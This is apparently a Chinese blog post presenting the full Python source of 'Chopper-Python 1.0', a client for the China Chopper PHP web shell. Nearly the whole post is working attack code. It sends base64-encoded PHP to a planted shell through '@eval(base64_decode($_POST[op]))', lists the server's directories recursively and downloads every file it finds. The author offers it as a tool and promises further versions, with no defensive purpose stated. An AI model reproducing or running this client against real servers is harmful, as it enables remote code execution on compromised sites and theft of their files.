这是Chopper-Python version1.0版本,只实现了文件下载的功能。而且,没有很好地去处理异常情况。期待下一个版本
#! /usr/bin/env python #coding=utf-8 ‘‘‘ Soft: Chopper-Python version 1.0 Date: 2015/11/1 Author: Vicain ‘‘‘ from bs4 import BeautifulSoup from bs4 import NavigableString import requests import urllib import base64 import sys import os list_dir_op=""" function listDir($dirname){ header("Content-type:application/xml"); echo "<directory name=‘$dirname‘>"; if(is_dir($dirname)){ if($dir_stream = opendir($dirname)){ while(($file=readdir($dir_stream))!==false){ $current_file = $dirname."/".$file; if(is_dir($current_file)&&$file!=="."&&$file!==".."){ listDir($current_file); } elseif($file!=="."&&$file!==".."){ echo "<file name=‘$file‘></file>"; } } closedir($dir_stream); } echo "</directory>"; } } listDir("D:/wamp/www/mycode"); """ download_file_op=""" header("Content-Disposition:attachment"); readfile("file_name"); """ comment=""" 上面的php代码中,由于python会对‘\‘后面的字符进行转义,因此需要修改一下payload中的‘\‘... 我将路径全部统一成了‘/‘ """ url = "http://127.0.0.1/chopper.php" password = "jjy" file_list = [] def codeSet(): if(sys.getdefaultencoding()==‘ascii‘): reload(sys) sys.setdefaultencoding(‘utf-8‘) def postParameters(url,password,op): op = base64.b64encode(op) body = {password:"@eval(base64_decode($_POST[op]));","op":op} response = requests.post(url,data=body) soup = BeautifulSoup(response.text,"lxml") return soup.find(attrs={"name":"D:/wamp/www/mycode"}) #这里参数都是写死了的,只是作为测试! def xmlParser(root): #递归遍历文件,返回文件列表 global file_list p_name = root.attrs["name"] for sibling in root.contents: if not(isinstance(sibling, NavigableString)): if sibling.name == "directory": s_dname = p_name+"/"+sibling.attrs["name"] xmlParser(sibling) if sibling.name == "file": s_fname = sibling.attrs["name"] file_list.append(p_name+"/"+s_fname) def fileDownload(file_list,remote_dir,local_dir): global download_file_op t_download_file_op = download_file_op for file in file_list: t_local_dir = local_dir t_download_file_op = t_download_file_op.replace("file_name",file) #替换php脚本文件中的file_name op = base64.b64encode(t_download_file_op) body = {password:"@eval(base64_decode($_POST[op]));","op":op} response = requests.post(url,data=body) local_file = t_local_dir.strip(‘/‘)+‘/‘+remote_dir.strip(‘/‘).split(‘/‘)[-1]+‘/‘+file.split(remote_dir)[1] t_local_dir = ‘/‘.join(local_file.split(‘/‘)[0:-1]) if(os.path.exists(t_local_dir)==False): os.makedirs(t_local_dir) with open(local_file,‘wb‘) as f: f.write(response.text) sys.stdout.write(local_file+" has been written successfully!\n") sys.stdout.flush() print ‘End...‘ def main(): global file_list doc_xml = postParameters(url,password,list_dir_op) xmlParser(doc_xml) fileDownload(file_list,"D:/wamp/www/mycode/","c:/users/cain/desktop") if __name__=="__main__": codeSet() main()
原文:http://www.cnblogs.com/vicain/p/4928598.html